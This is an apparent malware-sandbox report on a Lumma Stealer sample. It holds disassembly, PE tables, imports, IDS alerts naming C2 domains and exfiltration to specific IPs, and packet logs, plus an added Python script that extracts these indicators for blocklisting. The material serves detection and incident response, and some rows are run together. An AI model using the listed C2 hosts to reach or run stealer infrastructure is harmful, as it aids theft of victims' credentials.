                                                                                                                                                                                                                                                                        call 00007F2188DCE639h
                                                                                                                                                                                                                                                                        jmp 00007F2188DCBF1Dh
                                                                                                                                                                                                                                                                        mov edi, edi
                                                                                                                                                                                                                                                                        push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0044B398h], eax
mov dword ptr [0044B394h], ecx
mov dword ptr [0044B390h], edx
mov dword ptr [0044B38Ch], ebx
mov dword ptr [0044B388h], esi
mov dword ptr [0044B384h], edi
mov word ptr [0044B3B0h], ss
mov word ptr [0044B3A4h], cs
mov word ptr [0044B380h], ds
mov word ptr [0044B37Ch], es
mov word ptr [0044B378h], fs
mov word ptr [0044B374h], gs
pushfd
pop dword ptr [0044B3A8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0044B39Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0044B3A0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0044B3ACh], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0044B2E8h], 00010001h
mov eax, dword ptr [0044B3A0h]
mov dword ptr [0044B29Ch], eax
mov dword ptr [0044B290h], C0000409h
mov dword ptr [0044B294h], 00000001h
mov eax, dword ptr [00444004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00444008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000BCh]
Programming Language:
• [C++] VS2008 build 21022
• [ASM] VS2008 build 21022
• [ C ] VS2008 build 21022
• [IMP] VS2005 build 50727
• [RES] VS2008 build 21022
• [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4285c | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x423000 | 0xe788 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x41000 | 0x19c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x3f35c | 0x3f400 | 788e12e460ebcf4c3686cc62aaf106e1 | False | 0.8044520442193676 | data | 7.373879060362512 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x41000 | 0x21a2 | 0x2200 | f2ee691459c316558f3c6c688c7741d2 | False | 0.3636259191176471 | data | 5.551267904276185 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x44000 | 0x3decd8 | 0xb800 | aa476e42cb3cfd0ec8d8ac4a0fb71446 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x423000 | 0xe788 | 0xe800 | df2c22e4407831221bcbea37944c2890 | False | 0.4050377155172414 | data | 4.5222426776239875 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x429e88 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 |  |  | 0.4276315789473684
RT_CURSOR | 0x429fd0 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 |  |  | 0.7368421052631579
RT_CURSOR | 0x42a100 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 |  |  | 0.06130705394190871
RT_ICON | 0x423630 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors |  |  | 0.5578358208955224
RT_ICON | 0x4244d8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors |  |  | 0.6155234657039711
RT_ICON | 0x424d80 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors |  |  | 0.6457373271889401
RT_ICON | 0x425448 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors |  |  | 0.6791907514450867
RT_ICON | 0x4259b0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 |  |  | 0.4371369294605809
RT_ICON | 0x427f58 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 |  |  | 0.5166510318949343
RT_ICON | 0x429000 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 |  |  | 0.5188524590163934
RT_ICON | 0x429988 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 |  |  | 0.6125886524822695
RT_STRING | 0x42c888 | 0x454 | data |  |  | 0.45126353790613716
RT_STRING | 0x42cce0 | 0x126 | data |  |  | 0.5238095238095238
RT_STRING | 0x42ce08 | 0x656 | data |  |  | 0.436498150431566
RT_STRING | 0x42d460 | 0x74c | data |  |  | 0.43147751605995716
RT_STRING | 0x42dbb0 | 0x6a4 | data |  |  | 0.4376470588235294
RT_STRING | 0x42e258 | 0x74c | data |  |  | 0.4229122055674518
RT_STRING | 0x42e9a8 | 0x70e | data |  |  | 0.4330011074197121
RT_STRING | 0x42f0b8 | 0x84e | data |  |  | 0.4195672624647225
RT_STRING | 0x42f908 | 0x662 | data |  |  | 0.43512851897184823
RT_STRING | 0x42ff70 | 0x964 | data |  |  | 0.4068219633943428
RT_STRING | 0x4308d8 | 0x66e | data |  |  | 0.4356014580801944
RT_STRING | 0x430f48 | 0x60a | data |  |  | 0.444372574385511
RT_STRING | 0x431558 | 0x22a | data |  |  | 0.47653429602888087
RT_ACCELERATOR | 0x429e68 | 0x20 | data |  |  | 1.15625
RT_GROUP_CURSOR | 0x429fb8 | 0x14 | data |  |  | 1.15
RT_GROUP_CURSOR | 0x42c6a8 | 0x22 | data |  |  | 1.088235294117647
RT_GROUP_ICON | 0x429df0 | 0x76 | data |  |  | 0.6610169491525424
RT_VERSION | 0x42c6d0 | 0x1b4 | data |  |  | 0.5711009174311926
DLL | Import
KERNEL32.dll | DeleteVolumeMountPointA, InterlockedDecrement, SetDefaultCommConfigW, GetEnvironmentStringsW, GetComputerNameW, GetModuleHandleW, GetDateFormatA, LoadLibraryW, GetConsoleMode, ReadProcessMemory, GetTimeFormatW, GetConsoleAliasW, CreateProcessA, GetAtomNameW, GetStartupInfoW, GetShortPathNameA, SetLastError, GetProcAddress, SearchPathA, PulseEvent, BuildCommDCBW, GetNumaHighestNodeNumber, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, LocalAlloc, AddAtomA, FoldStringW, SetLocaleInfoW, RequestWakeupLatency, WriteConsoleOutputAttribute, FindFirstVolumeA, FindAtomW, UnregisterWaitEx, OpenFileMappingA, CreateFileA, WriteConsoleW, SetFileAttributesA, GetCommandLineW, MultiByteToWideChar, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, DeleteCriticalSection, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, LeaveCriticalSection, EnterCriticalSection, GetLocaleInfoA, InitializeCriticalSectionAndSpinCount, HeapAlloc, VirtualAlloc, HeapReAlloc, RtlUnwind, HeapSize, ReadFile, GetConsoleCP, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP, GetModuleHandleA
USER32.dll | GetClassLongW
GDI32.dll | GetBitmapBits
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-28T09:58:54.873140+0100 | 2058576 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) | 1 | 192.168.2.6 | 63909 | 1.1.1.1 | 53 | UDP
2024-12-28T09:58:55.018066+0100 | 2058584 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) | 1 | 192.168.2.6 | 56116 | 1.1.1.1 | 53 | UDP
2024-12-28T09:58:55.160830+0100 | 2058586 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) | 1 | 192.168.2.6 | 54503 | 1.1.1.1 | 53 | UDP
2024-12-28T09:58:55.305197+0100 | 2058588 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) | 1 | 192.168.2.6 | 64950 | 1.1.1.1 | 53 | UDP
2024-12-28T09:58:55.466978+0100 | 2058580 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) | 1 | 192.168.2.6 | 54375 | 1.1.1.1 | 53 | UDP
2024-12-28T09:58:55.609799+0100 | 2058590 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) | 1 | 192.168.2.6 | 54142 | 1.1.1.1 | 53 | UDP
2024-12-28T09:58:55.752380+0100 | 2058572 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) | 1 | 192.168.2.6 | 59569 | 1.1.1.1 | 53 | UDP
2024-12-28T09:58:55.898293+0100 | 2058578 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) | 1 | 192.168.2.6 | 61581 | 1.1.1.1 | 53 | UDP
2024-12-28T09:58:57.685554+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49708 | 23.55.153.106 | 443 | TCP
2024-12-28T09:58:58.472225+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.6 | 49708 | 23.55.153.106 | 443 | TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:00.099091+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649710104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:00.824979+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649710104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:00.824979+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649710104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:02.275276+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649716104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:03.052008+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649716104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:03.052008+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649716104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:04.694621+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649722104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:05.741502+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649722104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:07.099147+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649728104.21.66.86443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:09.553637+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649737172.67.157.254443TCP
                                                                                                                                                                                                                                                                        2024-12-28T09:59:10.530843+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649737172.67.157.254443TCP
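The alert rows above are only useful to a responder once they are pivoted: which domains belong on a DNS blocklist, which servers were actually confirmed as C2 by a check-in or exfiltration signature, and which TCP flow each alert fired on. The script below is an added example, not part of the Joe Sandbox report and not Joe Sandbox or Suricata code. It re-parses a constructed subset of the report's alert and packet rows (columns separated with '|'), refangs the defanged domains, promotes a destination to a C2 IP only when a check-in or exfiltration signature names it (the marker list is my assumption; the JA3 and Steam Profile Lookup hits on 23.55.153.106 alone do not qualify), measures how many distinct CnC domains were resolved inside a short window, and ties TCP alerts to the flows in the packet table by the client 4-tuple. Treating the RFC 1918 address as the client side is also an assumption.

```python
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

CET = timezone(timedelta(hours=1))
# Constructed input: a subset of the report's alert rows, columns re-separated with '|'
# (Timestamp | SID | Signature | Severity | Src IP | Src Port | Dst IP | Dst Port | Proto).
ALERT_ROWS = """\
2024-12-28T09:58:54.873140+0100 | 2058576 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) | 1 | 192.168.2.6 | 63909 | 1.1.1.1 | 53 | UDP
2024-12-28T09:58:55.018066+0100 | 2058584 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) | 1 | 192.168.2.6 | 56116 | 1.1.1.1 | 53 | UDP
2024-12-28T09:58:55.160830+0100 | 2058586 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) | 1 | 192.168.2.6 | 54503 | 1.1.1.1 | 53 | UDP
2024-12-28T09:58:55.305197+0100 | 2058588 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) | 1 | 192.168.2.6 | 64950 | 1.1.1.1 | 53 | UDP
2024-12-28T09:58:55.466978+0100 | 2058580 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) | 1 | 192.168.2.6 | 54375 | 1.1.1.1 | 53 | UDP
2024-12-28T09:58:57.685554+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49708 | 23.55.153.106 | 443 | TCP
2024-12-28T09:58:58.472225+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.6 | 49708 | 23.55.153.106 | 443 | TCP
2024-12-28T09:59:00.824979+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49710 | 104.21.66.86 | 443 | TCP
2024-12-28T09:59:05.741502+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49722 | 104.21.66.86 | 443 | TCP
2024-12-28T09:59:10.530843+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49737 | 172.67.157.254 | 443 | TCP
"""
# Constructed input: four of the report's packet rows (Timestamp | Src Port | Dst Port | Src IP | Dst IP).
PACKET_ROWS = """\
Dec 28, 2024 09:58:56.187545061 CET | 49708 | 443 | 192.168.2.6 | 23.55.153.106
Dec 28, 2024 09:58:56.187597036 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:58.883692026 CET | 49710 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:58:58.883764029 CET | 443 | 49710 | 104.21.66.86 | 192.168.2.6
"""
DOMAIN_RE = re.compile(r"\(([\w.-]+)\s+\.(\w+)\)")  # defanged "(name .tld)" inside the signature text
PKT_TS_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d+) CET$")

def parse_alerts(text):
    out = []
    for line in text.strip().splitlines():
        ts, sid, sig, sev, sip, sport, dip, dport, proto = [c.strip() for c in line.split("|")]
        out.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"), "sid": int(sid), "sig": sig,
                    "sev": int(sev), "src": sip, "sport": int(sport), "dst": dip, "dport": int(dport),
                    "proto": proto})
    return out

def parse_packets(text):
    out = []
    for line in text.strip().splitlines():
        ts, sport, dport, sip, dip = [c.strip() for c in line.split("|")]
        m = PKT_TS_RE.match(ts)
        base = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S").replace(tzinfo=CET)
        micros = int(m.group(2)[:6].ljust(6, "0"))  # the report has nanoseconds; datetime keeps microseconds
        out.append({"ts": base + timedelta(microseconds=micros), "src": sip, "sport": int(sport),
                    "dst": dip, "dport": int(dport)})
    return out

def extract_iocs(alerts, c2_markers=("CnC Host Checkin", "Exfiltration")):
    """Domains named in DNS-lookup alerts, plus servers that a signature tied to an actual C2 exchange."""
    domains, c2_ips, sids = set(), set(), set()
    for a in alerts:
        sids.add(a["sid"])
        m = DOMAIN_RE.search(a["sig"])
        if m:
            domains.add(f"{m.group(1)}.{m.group(2)}")  # refang so it matches real DNS logs
        # Assumption: a JA3 or Steam-lookup hit alone does not make the server a C2 host.
        if any(mk in a["sig"] for mk in c2_markers):
            c2_ips.add(a["dst"])
    return {"domains": domains, "c2_ips": c2_ips, "sids": sids}

def dns_burst(alerts, window=timedelta(seconds=2)):
    """Most distinct CnC domains resolved inside `window`; a run of lookups in about a second
    is a stealer walking its fallback C2 list, not a single stray detection."""
    lookups = sorted((a["ts"], DOMAIN_RE.search(a["sig"]).group(0))
                     for a in alerts if "DNS Lookup" in a["sig"] and DOMAIN_RE.search(a["sig"]))
    return max((len({n for t, n in lookups[i:] if t - t0 <= window})
                for i, (t0, _) in enumerate(lookups)), default=0)

def build_flows(packets):
    """Group packets into client->server flows; the private address is taken as the client."""
    flows = defaultdict(lambda: {"packets": 0, "first": None})
    for p in packets:
        c = ipaddress.ip_address(p["src"]).is_private
        key = (p["src"], p["sport"], p["dst"], p["dport"]) if c else (p["dst"], p["dport"], p["src"], p["sport"])
        f = flows[key]
        f["packets"] += 1
        f["first"] = p["ts"] if f["first"] is None else min(f["first"], p["ts"])
    return dict(flows)

def correlate(alerts, flows):
    """Attach each TCP alert to the flow it fired on, keyed by the client 4-tuple."""
    hits = defaultdict(list)
    for a in alerts:
        key = (a["src"], a["sport"], a["dst"], a["dport"])
        if a["proto"] == "TCP" and key in flows:
            hits[key].append(a["sid"])
    return dict(hits)

def summarize(alert_text=ALERT_ROWS, packet_text=PACKET_ROWS):
    alerts = parse_alerts(alert_text)
    flows = build_flows(parse_packets(packet_text))
    return {"iocs": extract_iocs(alerts), "burst": dns_burst(alerts), "flows": flows,
            "hits": correlate(alerts, flows)}

if __name__ == "__main__":
    print(summarize())
```

Run it on the full table by pasting every row into the two constants. On the subset above it yields five blocklist domains, the two C2 IPs (104.21.66.86 and 172.67.157.254), a burst of five distinct CnC domains inside two seconds, and the Steam host left out of the C2 set while its flow still carries the JA3 and Steam-lookup SIDs for the analyst to pivot on.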
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 28, 2024 09:58:56.187545061 CET | 49708 | 443 | 192.168.2.6 | 23.55.153.106
Dec 28, 2024 09:58:56.187597036 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:56.187659025 CET | 49708 | 443 | 192.168.2.6 | 23.55.153.106
Dec 28, 2024 09:58:56.191073895 CET | 49708 | 443 | 192.168.2.6 | 23.55.153.106
Dec 28, 2024 09:58:56.191087961 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:57.685441017 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:57.685554028 CET | 49708 | 443 | 192.168.2.6 | 23.55.153.106
Dec 28, 2024 09:58:57.688344955 CET | 49708 | 443 | 192.168.2.6 | 23.55.153.106
Dec 28, 2024 09:58:57.688369989 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:57.688685894 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:57.729907990 CET | 49708 | 443 | 192.168.2.6 | 23.55.153.106
Dec 28, 2024 09:58:57.738177061 CET | 49708 | 443 | 192.168.2.6 | 23.55.153.106
Dec 28, 2024 09:58:57.779331923 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:58.472249985 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:58.472282887 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:58.472320080 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:58.472321033 CET | 49708 | 443 | 192.168.2.6 | 23.55.153.106
Dec 28, 2024 09:58:58.472343922 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:58.472368002 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:58.472387075 CET | 49708 | 443 | 192.168.2.6 | 23.55.153.106
Dec 28, 2024 09:58:58.472387075 CET | 49708 | 443 | 192.168.2.6 | 23.55.153.106
Dec 28, 2024 09:58:58.472392082 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:58.472414017 CET | 49708 | 443 | 192.168.2.6 | 23.55.153.106
Dec 28, 2024 09:58:58.472429991 CET | 49708 | 443 | 192.168.2.6 | 23.55.153.106
Dec 28, 2024 09:58:58.668241024 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:58.668313026 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:58.668370008 CET | 49708 | 443 | 192.168.2.6 | 23.55.153.106
Dec 28, 2024 09:58:58.668400049 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:58.668440104 CET | 49708 | 443 | 192.168.2.6 | 23.55.153.106
Dec 28, 2024 09:58:58.698843002 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:58.698880911 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:58.698947906 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:58.698947906 CET | 49708 | 443 | 192.168.2.6 | 23.55.153.106
Dec 28, 2024 09:58:58.698992014 CET | 49708 | 443 | 192.168.2.6 | 23.55.153.106
Dec 28, 2024 09:58:58.701005936 CET | 49708 | 443 | 192.168.2.6 | 23.55.153.106
Dec 28, 2024 09:58:58.701036930 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:58.701054096 CET | 49708 | 443 | 192.168.2.6 | 23.55.153.106
Dec 28, 2024 09:58:58.701060057 CET | 443 | 49708 | 23.55.153.106 | 192.168.2.6
Dec 28, 2024 09:58:58.883692026 CET | 49710 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:58:58.883764029 CET | 443 | 49710 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:58:58.883867025 CET | 49710 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:58:58.884241104 CET | 49710 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:58:58.884260893 CET | 443 | 49710 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:00.098989010 CET | 443 | 49710 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:00.099091053 CET | 49710 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:59:00.100666046 CET | 49710 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:59:00.100681067 CET | 443 | 49710 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:00.100944996 CET | 443 | 49710 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:00.102242947 CET | 49710 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:59:00.102242947 CET | 49710 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:59:00.102308989 CET | 443 | 49710 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:00.824990988 CET | 443 | 49710 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:00.825089931 CET | 443 | 49710 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:00.825172901 CET | 49710 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:59:00.825419903 CET | 49710 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:59:00.825444937 CET | 443 | 49710 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:00.825459003 CET | 49710 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:59:00.825464964 CET | 443 | 49710 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:01.017591953 CET | 49716 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:59:01.017656088 CET | 443 | 49716 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:01.017771006 CET | 49716 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:59:01.018115997 CET | 49716 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:59:01.018132925 CET | 443 | 49716 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:02.275182009 CET | 443 | 49716 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:02.275275946 CET | 49716 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:59:02.326536894 CET | 49716 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:59:02.326574087 CET | 443 | 49716 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:02.326947927 CET | 443 | 49716 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:02.328845978 CET | 49716 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:59:02.328845978 CET | 49716 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:59:02.328974962 CET | 443 | 49716 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:03.052025080 CET | 443 | 49716 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:03.052062035 CET | 443 | 49716 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:03.052087069 CET | 443 | 49716 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:03.052114964 CET | 49716 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:59:03.052117109 CET | 443 | 49716 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:03.052162886 CET | 443 | 49716 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:03.052186012 CET | 49716 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:59:03.052210093 CET | 443 | 49716 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:03.052275896 CET | 49716 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:59:03.052290916 CET | 443 | 49716 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:03.060434103 CET | 443 | 49716 | 104.21.66.86 | 192.168.2.6
Dec 28, 2024 09:59:03.060483932 CET | 49716 | 443 | 192.168.2.6 | 104.21.66.86
Dec 28, 2024 09:59:03.060498953 CET | 443 | 49716 | 104.21.66.86 | 192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.077070951 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.077121973 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.077137947 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.120714903 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.171304941 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.214319944 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.253094912 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257051945 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257082939 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257117033 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257138968 CET44349716104.21.66.86192.168.2.6
